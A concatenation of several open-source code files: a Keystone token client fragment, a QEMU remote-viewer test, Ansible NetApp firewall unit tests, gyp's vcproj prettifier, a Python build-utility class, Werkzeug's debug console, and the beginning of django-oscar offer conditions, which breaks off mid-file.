def request(self, method, url, extra_headers=False, headers=None,
body=None):
"""A simple HTTP request interface."""
if headers is None:
            # Always accept 'json', for the xml token client too,
            # because an XML response is not easily converted to
            # the corresponding JSON one.
headers = self.get_headers(accept_type="json")
elif extra_headers:
try:
headers.update(self.get_headers(accept_type="json"))
except (ValueError, TypeError):
headers = self.get_headers(accept_type="json")
resp, resp_body = self.raw_request(url, method,
headers=headers, body=body)
self._log_request(method, url, resp, req_headers=headers,
req_body='<omitted>', resp_body=resp_body)
if resp.status in [401, 403]:
resp_body = json.loads(resp_body)
raise exceptions.Unauthorized(resp_body['error']['message'])
elif resp.status not in [200, 201, 204]:
raise exceptions.IdentityError(
'Unexpected status code {0}'.format(resp.status))
return resp, json.loads(resp_body)
def get_token(self, **kwargs):
"""Returns (token id, token data) for supplied credentials"""
auth_data = kwargs.pop('auth_data', False)
if not (kwargs.get('user_domain_id') or
kwargs.get('user_domain_name')):
kwargs['user_domain_name'] = 'Default'
if not (kwargs.get('project_domain_id') or
kwargs.get('project_domain_name')):
kwargs['project_domain_name'] = 'Default'
body = self.auth(**kwargs)
token = body.response.get('x-subject-token')
if auth_data:
return token, body['token']
else:
return token
class V3TokenClientJSON(V3TokenClient):
LOG = logging.getLogger(__name__)
def _warn(self):
self.LOG.warning("%s class was deprecated and renamed to %s" %
(self.__class__.__name__, 'V3TokenClient'))
def __init__(self, *args, **kwargs):
self._warn()
super(V3TokenClientJSON, self).__init__(*args, **kwargs)
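# Minimal usage sketch (endpoint and credentials are placeholders):
#   client = V3TokenClient('http://keystone.example.com:5000/v3')
#   token, auth = client.get_token(username='admin', password='secret',
#                                  project_name='demo', auth_data=True)
#   # `token` is the X-Subject-Token id, `auth` the decoded token body.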
| apache-2.0 |
tolimit/tp-qemu | qemu/tests/rv_fullscreen.py | 9 | 3359 | """
rv_fullscreen.py - remote-viewer full screen
Testing the remote-viewer --full-screen option
If successful, the resolution of the guest will
take the resolution of the client.
Requires: the remote-viewer binary, Xorg, and a GNOME session on the client
"""
import logging
from aexpect import ShellCmdError
from autotest.client.shared import error
def run(test, params, env):
"""
Tests the --full-screen option
Positive test: full_screen param = yes, verify guest res = client res
Negative test: full_screen param= no, verify guest res != client res
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
# Get the parameters needed for the test
full_screen = params.get("full_screen")
guest_vm = env.get_vm(params["guest_vm"])
client_vm = env.get_vm(params["client_vm"])
guest_vm.verify_alive()
guest_session = guest_vm.wait_for_login(
timeout=int(params.get("login_timeout", 360)))
client_vm.verify_alive()
client_session = client_vm.wait_for_login(
timeout=int(params.get("login_timeout", 360)))
# Get the resolution of the client & guest
logging.info("Getting the Resolution on the client")
client_session.cmd("export DISPLAY=:0.0")
    client_res_raw = ""  # initialised so the error paths below can reference it
    try:
client_session.cmd("xrandr | grep '*' >/tmp/res")
client_res_raw = client_session.cmd("cat /tmp/res|awk '{print $1}'")
client_res = client_res_raw.split()[0]
except ShellCmdError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % client_res_raw)
except IndexError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % client_res_raw)
logging.info("Getting the Resolution on the guest")
guest_session.cmd("export DISPLAY=:0.0")
    guest_res_raw = ""  # initialised so the error paths below can reference it
    try:
guest_session.cmd("xrandr | grep '*' >/tmp/res")
guest_res_raw = guest_session.cmd("cat /tmp/res|awk '{print $1}'")
guest_res = guest_res_raw.split()[0]
except ShellCmdError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % guest_res_raw)
except IndexError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % guest_res_raw)
logging.info("Here's the information I have: ")
logging.info("\nClient Resolution: " + client_res)
logging.info("\nGuest Resolution: " + guest_res)
# Positive Test, verify the guest takes the resolution of the client
if full_screen == "yes":
        if client_res == guest_res:
logging.info("PASS: Guest resolution is the same as the client")
else:
raise error.TestFail("Guest resolution differs from the client")
# Negative Test, verify the resolutions are not equal
elif full_screen == "no":
        if client_res != guest_res:
logging.info("PASS: Guest resolution differs from the client")
else:
raise error.TestFail("Guest resolution is the same as the client")
else:
raise error.TestFail("The test setup is incorrect.")
client_session.close()
guest_session.close()
| gpl-2.0 |
rosmo/ansible | test/units/modules/storage/netapp/test_na_ontap_firewall_policy.py | 25 | 10657 | # (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
''' unit test template for ONTAP Ansible module '''
from __future__ import print_function
import json
import pytest
from units.compat import unittest
from units.compat.mock import patch, Mock
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
import ansible.module_utils.netapp as netapp_utils
from ansible.modules.storage.netapp.na_ontap_firewall_policy \
import NetAppONTAPFirewallPolicy as fp_module # module under test
if not netapp_utils.has_netapp_lib():
pytestmark = pytest.mark.skip('skipping as missing required netapp_lib')
def set_module_args(args):
"""prepare arguments so that they will be picked up during module creation"""
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args) # pylint: disable=protected-access
class AnsibleExitJson(Exception):
"""Exception class to be raised by module.exit_json and caught by the test case"""
pass
class AnsibleFailJson(Exception):
"""Exception class to be raised by module.fail_json and caught by the test case"""
pass
def exit_json(*args, **kwargs): # pylint: disable=unused-argument
"""function to patch over exit_json; package return data into an exception"""
if 'changed' not in kwargs:
kwargs['changed'] = False
raise AnsibleExitJson(kwargs)
def fail_json(*args, **kwargs): # pylint: disable=unused-argument
"""function to patch over fail_json; package return data into an exception"""
kwargs['failed'] = True
raise AnsibleFailJson(kwargs)
class MockONTAPConnection(object):
''' mock server connection to ONTAP host '''
def __init__(self, kind=None, data=None):
''' save arguments '''
self.kind = kind
self.data = data
self.xml_in = None
self.xml_out = None
def invoke_successfully(self, xml, enable_tunneling): # pylint: disable=unused-argument
''' mock invoke_successfully returning xml data '''
self.xml_in = xml
if self.kind == 'policy':
xml = self.build_policy_info(self.data)
if self.kind == 'config':
xml = self.build_firewall_config_info(self.data)
self.xml_out = xml
return xml
@staticmethod
def build_policy_info(data):
''' build xml data for net-firewall-policy-info '''
xml = netapp_utils.zapi.NaElement('xml')
attributes = {
'num-records': 1,
'attributes-list': {
'net-firewall-policy-info': {
'policy': data['policy'],
'service': data['service'],
'allow-list': [
{'ip-and-mask': '1.2.3.0/24'}
]
}
}
}
xml.translate_struct(attributes)
return xml
@staticmethod
def build_firewall_config_info(data):
''' build xml data for net-firewall-config-info '''
xml = netapp_utils.zapi.NaElement('xml')
attributes = {
'attributes': {
'net-firewall-config-info': {
'is-enabled': 'true',
'is-logging': 'false'
}
}
}
xml.translate_struct(attributes)
return xml
class TestMyModule(unittest.TestCase):
''' a group of related Unit Tests '''
def setUp(self):
self.mock_module_helper = patch.multiple(basic.AnsibleModule,
exit_json=exit_json,
fail_json=fail_json)
self.mock_module_helper.start()
self.addCleanup(self.mock_module_helper.stop)
self.mock_policy = {
'policy': 'test',
'service': 'http',
'vserver': 'my_vserver',
'allow_list': '1.2.3.0/24'
}
self.mock_config = {
'node': 'test',
'enable': 'enable',
'logging': 'enable'
}
def mock_policy_args(self):
return {
'policy': self.mock_policy['policy'],
'service': self.mock_policy['service'],
'vserver': self.mock_policy['vserver'],
'allow_list': [self.mock_policy['allow_list']],
'hostname': 'test',
'username': 'test_user',
'password': 'test_pass!'
}
def mock_config_args(self):
return {
'node': self.mock_config['node'],
'enable': self.mock_config['enable'],
'logging': self.mock_config['logging'],
'hostname': 'test',
'username': 'test_user',
'password': 'test_pass!'
}
def get_mock_object(self, kind=None):
"""
Helper method to return an na_ontap_firewall_policy object
:param kind: passes this param to MockONTAPConnection()
:return: na_ontap_firewall_policy object
"""
obj = fp_module()
obj.autosupport_log = Mock(return_value=None)
if kind is None:
obj.server = MockONTAPConnection()
else:
mock_data = self.mock_config if kind == 'config' else self.mock_policy
obj.server = MockONTAPConnection(kind=kind, data=mock_data)
return obj
def test_module_fail_when_required_args_missing(self):
''' required arguments are reported as errors '''
with pytest.raises(AnsibleFailJson) as exc:
set_module_args({})
fp_module()
print('Info: %s' % exc.value.args[0]['msg'])
def test_helper_firewall_policy_attributes(self):
''' helper returns dictionary with vserver, service and policy details '''
data = self.mock_policy
set_module_args(self.mock_policy_args())
result = self.get_mock_object('policy').firewall_policy_attributes()
del data['allow_list']
assert data == result
def test_helper_validate_ip_addresses_positive(self):
''' test if helper validates if IP is a network address '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.0/16', '1.2.3.0/24']
set_module_args(data)
result = self.get_mock_object().validate_ip_addresses()
assert result is None
def test_helper_validate_ip_addresses_negative(self):
''' test if helper validates if IP is a network address '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.10/16', '1.2.3.0/24']
set_module_args(data)
with pytest.raises(AnsibleFailJson) as exc:
self.get_mock_object().validate_ip_addresses()
msg = 'Error: Invalid IP address value for allow_list parameter.' \
'Please specify a network address without host bits set: ' \
'1.2.0.10/16 has host bits set'
assert exc.value.args[0]['msg'] == msg
def test_get_nonexistent_policy(self):
''' Test if get_firewall_policy returns None for non-existent policy '''
set_module_args(self.mock_policy_args())
result = self.get_mock_object().get_firewall_policy()
assert result is None
def test_get_existing_policy(self):
''' Test if get_firewall_policy returns policy details for existing policy '''
data = self.mock_policy_args()
set_module_args(data)
result = self.get_mock_object('policy').get_firewall_policy()
assert result['service'] == data['service']
assert result['allow_list'] == ['1.2.3.0/24'] # from build_policy_info()
def test_successful_create(self):
''' Test successful create '''
set_module_args(self.mock_policy_args())
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object().apply()
assert exc.value.args[0]['changed']
def test_create_idempotency(self):
''' Test create idempotency '''
set_module_args(self.mock_policy_args())
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert not exc.value.args[0]['changed']
def test_successful_delete(self):
''' Test delete existing job '''
data = self.mock_policy_args()
data['state'] = 'absent'
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert exc.value.args[0]['changed']
def test_delete_idempotency(self):
''' Test delete idempotency '''
data = self.mock_policy_args()
data['state'] = 'absent'
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object().apply()
assert not exc.value.args[0]['changed']
def test_successful_modify(self):
''' Test successful modify allow_list '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.0/16']
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert exc.value.args[0]['changed']
    def test_successful_modify_multiple_ips(self):
        ''' Test successful modify of allow_list with multiple IPs '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.0/16', '1.0.0.0/8']
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert exc.value.args[0]['changed']
def test_get_nonexistent_config(self):
''' Test if get_firewall_config returns None for non-existent node '''
set_module_args(self.mock_config_args())
result = self.get_mock_object().get_firewall_config_for_node()
assert result is None
def test_get_existing_config(self):
''' Test if get_firewall_config returns policy details for existing node '''
data = self.mock_config_args()
set_module_args(data)
result = self.get_mock_object('config').get_firewall_config_for_node()
        assert result['enable'] == 'enable'  # from build_firewall_config_info()
        assert result['logging'] == 'disable'  # from build_firewall_config_info()
def test_successful_modify_config(self):
''' Test successful modify allow_list '''
data = self.mock_config_args()
data['enable'] = 'disable'
data['logging'] = 'enable'
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('config').apply()
assert exc.value.args[0]['changed']
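# These are pytest-style unit tests; an illustrative invocation from the
# Ansible source tree (path taken from this file's location):
#   pytest test/units/modules/storage/netapp/test_na_ontap_firewall_policy.py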
| gpl-3.0 |
vito16/express2 | node_modules/cordova/node_modules/plugman/node_modules/npm/node_modules/node-gyp/gyp/tools/pretty_vcproj.py | 2637 | 9586 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Make the format of a vcproj really pretty.
This script normalize and sort an xml. It also fetches all the properties
inside linked vsprops and include them explicitly in the vcproj.
It outputs the resulting xml to stdout.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import sys
from xml.dom.minidom import parse
from xml.dom.minidom import Node
REPLACEMENTS = dict()
ARGUMENTS = None
class CmpTuple(object):
"""Compare function between 2 tuple."""
def __call__(self, x, y):
return cmp(x[0], y[0])
class CmpNode(object):
"""Compare function between 2 xml nodes."""
def __call__(self, x, y):
def get_string(node):
node_string = "node"
node_string += node.nodeName
if node.nodeValue:
node_string += node.nodeValue
if node.attributes:
# We first sort by name, if present.
node_string += node.getAttribute("Name")
all_nodes = []
for (name, value) in node.attributes.items():
all_nodes.append((name, value))
all_nodes.sort(CmpTuple())
for (name, value) in all_nodes:
node_string += name
node_string += value
return node_string
return cmp(get_string(x), get_string(y))
def PrettyPrintNode(node, indent=0):
if node.nodeType == Node.TEXT_NODE:
if node.data.strip():
print '%s%s' % (' '*indent, node.data.strip())
return
if node.childNodes:
node.normalize()
# Get the number of attributes
attr_count = 0
if node.attributes:
attr_count = node.attributes.length
# Print the main tag
if attr_count == 0:
print '%s<%s>' % (' '*indent, node.nodeName)
else:
print '%s<%s' % (' '*indent, node.nodeName)
all_attributes = []
for (name, value) in node.attributes.items():
all_attributes.append((name, value))
all_attributes.sort(CmpTuple())
for (name, value) in all_attributes:
print '%s %s="%s"' % (' '*indent, name, value)
print '%s>' % (' '*indent)
if node.nodeValue:
print '%s %s' % (' '*indent, node.nodeValue)
for sub_node in node.childNodes:
PrettyPrintNode(sub_node, indent=indent+2)
print '%s</%s>' % (' '*indent, node.nodeName)
def FlattenFilter(node):
"""Returns a list of all the node and sub nodes."""
node_list = []
if (node.attributes and
node.getAttribute('Name') == '_excluded_files'):
# We don't add the "_excluded_files" filter.
return []
for current in node.childNodes:
if current.nodeName == 'Filter':
node_list.extend(FlattenFilter(current))
else:
node_list.append(current)
return node_list
def FixFilenames(filenames, current_directory):
new_list = []
for filename in filenames:
if filename:
for key in REPLACEMENTS:
filename = filename.replace(key, REPLACEMENTS[key])
os.chdir(current_directory)
filename = filename.strip('"\' ')
if filename.startswith('$'):
new_list.append(filename)
else:
new_list.append(os.path.abspath(filename))
return new_list
def AbsoluteNode(node):
"""Makes all the properties we know about in this node absolute."""
if node.attributes:
for (name, value) in node.attributes.items():
if name in ['InheritedPropertySheets', 'RelativePath',
'AdditionalIncludeDirectories',
'IntermediateDirectory', 'OutputDirectory',
'AdditionalLibraryDirectories']:
# We want to fix up these paths
path_list = value.split(';')
new_list = FixFilenames(path_list, os.path.dirname(ARGUMENTS[1]))
node.setAttribute(name, ';'.join(new_list))
if not value:
node.removeAttribute(name)
def CleanupVcproj(node):
"""For each sub node, we call recursively this function."""
for sub_node in node.childNodes:
AbsoluteNode(sub_node)
CleanupVcproj(sub_node)
  # Normalize the node, and remove all extraneous whitespace.
for sub_node in node.childNodes:
if sub_node.nodeType == Node.TEXT_NODE:
sub_node.data = sub_node.data.replace("\r", "")
sub_node.data = sub_node.data.replace("\n", "")
sub_node.data = sub_node.data.rstrip()
  # Sort all the semicolon-separated attributes and remove duplicates.
if node.attributes:
for (name, value) in node.attributes.items():
sorted_list = sorted(value.split(';'))
unique_list = []
for i in sorted_list:
if not unique_list.count(i):
unique_list.append(i)
node.setAttribute(name, ';'.join(unique_list))
if not value:
node.removeAttribute(name)
if node.childNodes:
node.normalize()
# For each node, take a copy, and remove it from the list.
node_array = []
while node.childNodes and node.childNodes[0]:
# Take a copy of the node and remove it from the list.
current = node.childNodes[0]
node.removeChild(current)
# If the child is a filter, we want to append all its children
# to this same list.
if current.nodeName == 'Filter':
node_array.extend(FlattenFilter(current))
else:
node_array.append(current)
# Sort the list.
node_array.sort(CmpNode())
# Insert the nodes in the correct order.
for new_node in node_array:
# But don't append empty tool node.
if new_node.nodeName == 'Tool':
if new_node.attributes and new_node.attributes.length == 1:
# This one was empty.
continue
if new_node.nodeName == 'UserMacro':
continue
node.appendChild(new_node)
def GetConfigurationNodes(vcproj):
#TODO(nsylvain): Find a better way to navigate the xml.
nodes = []
for node in vcproj.childNodes:
if node.nodeName == "Configurations":
for sub_node in node.childNodes:
if sub_node.nodeName == "Configuration":
nodes.append(sub_node)
return nodes
def GetChildrenVsprops(filename):
dom = parse(filename)
if dom.documentElement.attributes:
vsprops = dom.documentElement.getAttribute('InheritedPropertySheets')
return FixFilenames(vsprops.split(';'), os.path.dirname(filename))
return []
def SeekToNode(node1, child2):
# A text node does not have properties.
if child2.nodeType == Node.TEXT_NODE:
return None
# Get the name of the current node.
current_name = child2.getAttribute("Name")
if not current_name:
# There is no name. We don't know how to merge.
return None
# Look through all the nodes to find a match.
for sub_node in node1.childNodes:
if sub_node.nodeName == child2.nodeName:
name = sub_node.getAttribute("Name")
if name == current_name:
return sub_node
# No match. We give up.
return None
def MergeAttributes(node1, node2):
# No attributes to merge?
if not node2.attributes:
return
for (name, value2) in node2.attributes.items():
# Don't merge the 'Name' attribute.
if name == 'Name':
continue
value1 = node1.getAttribute(name)
if value1:
# The attribute exist in the main node. If it's equal, we leave it
# untouched, otherwise we concatenate it.
if value1 != value2:
node1.setAttribute(name, ';'.join([value1, value2]))
else:
      # The attribute does not exist in the main node. We append this one.
node1.setAttribute(name, value2)
    # If the attribute was a property-sheet attribute, we remove it, since
    # it is useless here.
if name == 'InheritedPropertySheets':
node1.removeAttribute(name)
def MergeProperties(node1, node2):
MergeAttributes(node1, node2)
for child2 in node2.childNodes:
child1 = SeekToNode(node1, child2)
if child1:
MergeProperties(child1, child2)
else:
node1.appendChild(child2.cloneNode(True))
def main(argv):
"""Main function of this vcproj prettifier."""
global ARGUMENTS
ARGUMENTS = argv
  # Check that we were given at least the vcproj path.
if len(argv) < 2:
print ('Usage: %s "c:\\path\\to\\vcproj.vcproj" [key1=value1] '
'[key2=value2]' % argv[0])
return 1
# Parse the keys
for i in range(2, len(argv)):
(key, value) = argv[i].split('=')
REPLACEMENTS[key] = value
# Open the vcproj and parse the xml.
dom = parse(argv[1])
# First thing we need to do is find the Configuration Node and merge them
# with the vsprops they include.
  for configuration_node in GetConfigurationNodes(dom.documentElement):
# Get the property sheets associated with this configuration.
vsprops = configuration_node.getAttribute('InheritedPropertySheets')
# Fix the filenames to be absolute.
vsprops_list = FixFilenames(vsprops.strip().split(';'),
os.path.dirname(argv[1]))
# Extend the list of vsprops with all vsprops contained in the current
# vsprops.
for current_vsprops in vsprops_list:
vsprops_list.extend(GetChildrenVsprops(current_vsprops))
# Now that we have all the vsprops, we need to merge them.
for current_vsprops in vsprops_list:
MergeProperties(configuration_node,
parse(current_vsprops).documentElement)
# Now that everything is merged, we need to cleanup the xml.
CleanupVcproj(dom.documentElement)
  # Finally, we use the pretty-printing function to write the vcproj back to
  # the user.
#print dom.toprettyxml(newl="\n")
PrettyPrintNode(dom.documentElement)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
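# Illustrative invocation (the key=value pairs populate REPLACEMENTS and are
# placeholders here):
#   python pretty_vcproj.py project.vcproj "$(SolutionDir)=C:\src\proj\" > pretty.xml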
| mit |
nickjhathaway/gtkmmExperiment | scripts/pyUtils/utils.py | 8 | 7400 | #!/usr/bin/env python3
import urllib.request, urllib.parse, urllib.error, os, shutil, tarfile, multiprocessing, subprocess, sys, socket
from color_text import ColorText as CT
class Utils:
@staticmethod
def isMac():
return sys.platform == "darwin"
@staticmethod
def connectedInternet():
#from http://stackoverflow.com/questions/20913411/test-if-an-internet-connection-is-present-in-python
try:
# see if we can resolve the host name -- tells us if there is
# a DNS listening
host = socket.gethostbyname("www.google.com")
# connect to the host -- tells us if the host is actually
# reachable
s = socket.create_connection((host, 80), 2)
return True
except:
pass
return False
@staticmethod
def which(program):
#from http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
@staticmethod
def hasProgram(program):
whichOutput = Utils.which(program);
return None != whichOutput;
@staticmethod
def run_in_dir(cmd, d):
#print CT.boldBlack("here")
cmd = "cd " + Utils.shellquote(d) + " && " + cmd + " && cd -"
#print CT.boldBlack("newcmd")
print(CT.boldGreen(cmd))
Utils.run(cmd)
@staticmethod
def run(cmd):
# from http://stackoverflow.com/a/4418193
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
#output, errors = process.communicate()
#sys.stdout.write(output.decode('utf-8'))
#sys.stdout.flush()
output = "";
while True:
nextline = process.stdout.readline().decode('utf-8')
if nextline == '' and process.poll() != None:
break
sys.stdout.write(nextline)
output = output + nextline
sys.stdout.flush()
exitCode = process.returncode
if (exitCode == 0):
return output
raise Exception(cmd, exitCode, output)
@staticmethod
def runAndCapture(cmd):
# from http://stackoverflow.com/a/4418193
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, errors = process.communicate()
        # communicate() is supposed to capture the output here, but it was not
        # always doing so, hence the line-by-line capture used in run() above
exitCode = process.returncode
if (exitCode == 0):
return output.decode('utf-8')
raise Exception(cmd, exitCode, output.decode('utf-8'), errors)
@staticmethod
def shellquote(s):
#from http://stackoverflow.com/a/35857
return "'" + s.replace("'", "'\\''") + "'"
@staticmethod
def num_cores():
return multiprocessing.cpu_count()
@staticmethod
def mkdir(d):
'''mkdir if it doesn't already exist '''
if not os.path.exists(d):
print(CT.boldText("mkdir"), CT.boldGreen(d))
os.makedirs(d)
@staticmethod
def get_file(url, d):
        '''Get file from url, save it into directory d, and return the new path.'''
fn = url.split('/')[-1]
out_fnp = os.path.join(d, fn)
urllib.request.urlretrieve(url, out_fnp)
return out_fnp
@staticmethod
def get_file_if_size_diff(url, d):
        '''Only download the file if needed. Not completely fail-proof since it is
        just a size check, but sizes are fairly unlikely to match when contents differ.'''
fn = url.split('/')[-1]
out_fnp = os.path.join(d, fn)
net_file_size = int(urllib.request.urlopen(url).info()['Content-Length'])
if os.path.exists(out_fnp):
fn_size = os.path.getsize(out_fnp)
if fn_size == net_file_size:
print("skipping download of", CT.boldGreen(fn))
return out_fnp
else:
print("files sizes differed:", "on disk:", fn_size, "from net:", net_file_size)
print("retrieving", CT.boldGreen(fn), "from", CT.boldBlue(url))
urllib.request.urlretrieve(url, out_fnp)
return out_fnp
@staticmethod
def rm_rf(d):
'''remove directory forcibly'''
if os.path.exists(d):
print(CT.boldText("rm -rf"), CT.boldRed(d))
shutil.rmtree(d)
@staticmethod
def untar(fnp, d):
        ''' Unpack a compressed file, guessing the format from its extension '''
if fnp.endswith(".tar.gz"):
tar = tarfile.open(fnp, "r:gz")
elif fnp.endswith(".tgz"):
tar = tarfile.open(fnp, "r:gz")
elif fnp.endswith(".tar.bz2"):
tar = tarfile.open(fnp, "r:bz2")
elif fnp.endswith(".tar"):
tar = tarfile.open(fnp, "r")
else:
raise Exception("invalid file? " + fnp)
print("untarring", CT.boldGreen(fnp), "to", CT.boldBlue(d))
tar.extractall(d)
tar.close()
@staticmethod
def getStrFromStrOrList(inputArg):
if isinstance(inputArg, list):
return str(inputArg[0])
elif not isinstance(inputArg, str):
return str(inputArg)
else:
return inputArg
@staticmethod
def clear_dir(d):
''' forcibly delete directory and then re-make it'''
Utils.rm_rf(d)
Utils.mkdir(d)
@staticmethod
def ensureLibDirectoryPresent(localInstallDir):
"""
If a dynamic library's id isn't it's full path name and it isn't in the
dylib search path it won't be linked in properly, so will modify the id
of the libraries to be it's full name
"""
libDir = os.path.join(localInstallDir, "lib")
lib64Dir = os.path.join(localInstallDir, "lib64")
if os.path.exists(lib64Dir) and not os.path.exists(libDir):
os.symlink(lib64Dir, libDir);
@staticmethod
def fixDyLibOnMac(libDir):
"""
If a dynamic library's id isn't it's full path name and it isn't in the
dylib search path it won't be linked in properly, so will modify the id
of the libraries to be it's full name
"""
files = os.listdir(libDir)
for file in files:
fullFile = os.path.join(libDir, file)
if os.path.isfile(fullFile) and str(fullFile).endswith(".dylib"):
try:
cmd = "install_name_tool -id {full_libpath} {full_libpath}".format(full_libpath = os.path.abspath(fullFile))
Utils.run(cmd)
except Exception as e:
                    print(e)
                    print("Failed to fix dylib for {path}".format(path=os.path.abspath(fullFile)))
elif os.path.isdir(fullFile):
Utils.fixDyLibOnMac(fullFile)
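# Usage sketch combining the helpers above (paths are placeholders):
#   if Utils.hasProgram("cmake"):
#       Utils.mkdir("/tmp/build")
#       Utils.run_in_dir("cmake --version", "/tmp/build")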
| gpl-3.0 |
ljnutal6/media-recommend | app/virtualenvs/recommedia/lib/python2.7/site-packages/werkzeug/debug/console.py | 314 | 5557 | # -*- coding: utf-8 -*-
"""
werkzeug.debug.console
~~~~~~~~~~~~~~~~~~~~~~
Interactive console support.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD.
"""
import sys
import code
from types import CodeType
from werkzeug.utils import escape
from werkzeug.local import Local
from werkzeug.debug.repr import debug_repr, dump, helper
_local = Local()
class HTMLStringO(object):
"""A StringO version that HTML escapes on write."""
def __init__(self):
self._buffer = []
def isatty(self):
return False
def close(self):
pass
def flush(self):
pass
def seek(self, n, mode=0):
pass
def readline(self):
if len(self._buffer) == 0:
return ''
ret = self._buffer[0]
del self._buffer[0]
return ret
def reset(self):
val = ''.join(self._buffer)
del self._buffer[:]
return val
def _write(self, x):
if isinstance(x, bytes):
x = x.decode('utf-8', 'replace')
self._buffer.append(x)
def write(self, x):
self._write(escape(x))
def writelines(self, x):
self._write(escape(''.join(x)))
class ThreadedStream(object):
"""Thread-local wrapper for sys.stdout for the interactive console."""
def push():
if not isinstance(sys.stdout, ThreadedStream):
sys.stdout = ThreadedStream()
_local.stream = HTMLStringO()
push = staticmethod(push)
def fetch():
try:
stream = _local.stream
except AttributeError:
return ''
return stream.reset()
fetch = staticmethod(fetch)
def displayhook(obj):
try:
stream = _local.stream
except AttributeError:
return _displayhook(obj)
# stream._write bypasses escaping as debug_repr is
# already generating HTML for us.
if obj is not None:
_local._current_ipy.locals['_'] = obj
stream._write(debug_repr(obj))
displayhook = staticmethod(displayhook)
def __setattr__(self, name, value):
raise AttributeError('read only attribute %s' % name)
def __dir__(self):
return dir(sys.__stdout__)
def __getattribute__(self, name):
if name == '__members__':
return dir(sys.__stdout__)
try:
stream = _local.stream
except AttributeError:
stream = sys.__stdout__
return getattr(stream, name)
def __repr__(self):
return repr(sys.__stdout__)
# add the threaded stream as display hook
_displayhook = sys.displayhook
sys.displayhook = ThreadedStream.displayhook
class _ConsoleLoader(object):
def __init__(self):
self._storage = {}
def register(self, code, source):
self._storage[id(code)] = source
# register code objects of wrapped functions too.
for var in code.co_consts:
if isinstance(var, CodeType):
self._storage[id(var)] = source
def get_source_by_code(self, code):
try:
return self._storage[id(code)]
except KeyError:
pass
def _wrap_compiler(console):
compile = console.compile
def func(source, filename, symbol):
code = compile(source, filename, symbol)
console.loader.register(code, source)
return code
console.compile = func
class _InteractiveConsole(code.InteractiveInterpreter):
def __init__(self, globals, locals):
code.InteractiveInterpreter.__init__(self, locals)
self.globals = dict(globals)
self.globals['dump'] = dump
self.globals['help'] = helper
self.globals['__loader__'] = self.loader = _ConsoleLoader()
self.more = False
self.buffer = []
_wrap_compiler(self)
def runsource(self, source):
source = source.rstrip() + '\n'
ThreadedStream.push()
prompt = self.more and '... ' or '>>> '
try:
source_to_eval = ''.join(self.buffer + [source])
if code.InteractiveInterpreter.runsource(self,
source_to_eval, '<debugger>', 'single'):
self.more = True
self.buffer.append(source)
else:
self.more = False
del self.buffer[:]
finally:
output = ThreadedStream.fetch()
return prompt + source + output
def runcode(self, code):
try:
eval(code, self.globals, self.locals)
except Exception:
self.showtraceback()
def showtraceback(self):
from werkzeug.debug.tbtools import get_current_traceback
tb = get_current_traceback(skip=1)
sys.stdout._write(tb.render_summary())
def showsyntaxerror(self, filename=None):
from werkzeug.debug.tbtools import get_current_traceback
tb = get_current_traceback(skip=4)
sys.stdout._write(tb.render_summary())
def write(self, data):
sys.stdout.write(data)
class Console(object):
"""An interactive console."""
def __init__(self, globals=None, locals=None):
if locals is None:
locals = {}
if globals is None:
globals = {}
self._ipy = _InteractiveConsole(globals, locals)
def eval(self, code):
_local._current_ipy = self._ipy
old_sys_stdout = sys.stdout
try:
return self._ipy.runsource(code)
finally:
sys.stdout = old_sys_stdout
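# Usage sketch (illustrative): eval() returns the prompt plus the source and
# the HTML rendering of any output.
#   c = Console()
#   html = c.eval('1 + 1')   # starts with '>>> 1 + 1', then the HTML repr of 2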
| gpl-2.0 |
amirrpp/django-oscar | src/oscar/apps/offer/conditions.py | 23 | 10607 | from decimal import Decimal as D, ROUND_UP
from django.utils import six
from django.utils.translation import ungettext, ugettext_lazy as _
from oscar.apps.offer import utils
from oscar.core.loading import get_model
from oscar.templatetags.currency_filters import currency
Condition = get_model('offer', 'Condition')
__all__ = [
'CountCondition', 'CoverageCondition', 'ValueCondition'
]
class CountCondition(Condition):
"""
An offer condition dependent on the NUMBER of matching items from the
basket.
"""
_description = _("Basket includes %(count)d item(s) from %(range)s")
@property
def name(self):
return self._description % {
'count': self.value,
'range': six.text_type(self.range).lower()}
@property
def description(self):
return self._description % {
'count': self.value,
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Count condition")
verbose_name_plural = _("Count conditions")
def is_satisfied(self, offer, basket):
"""
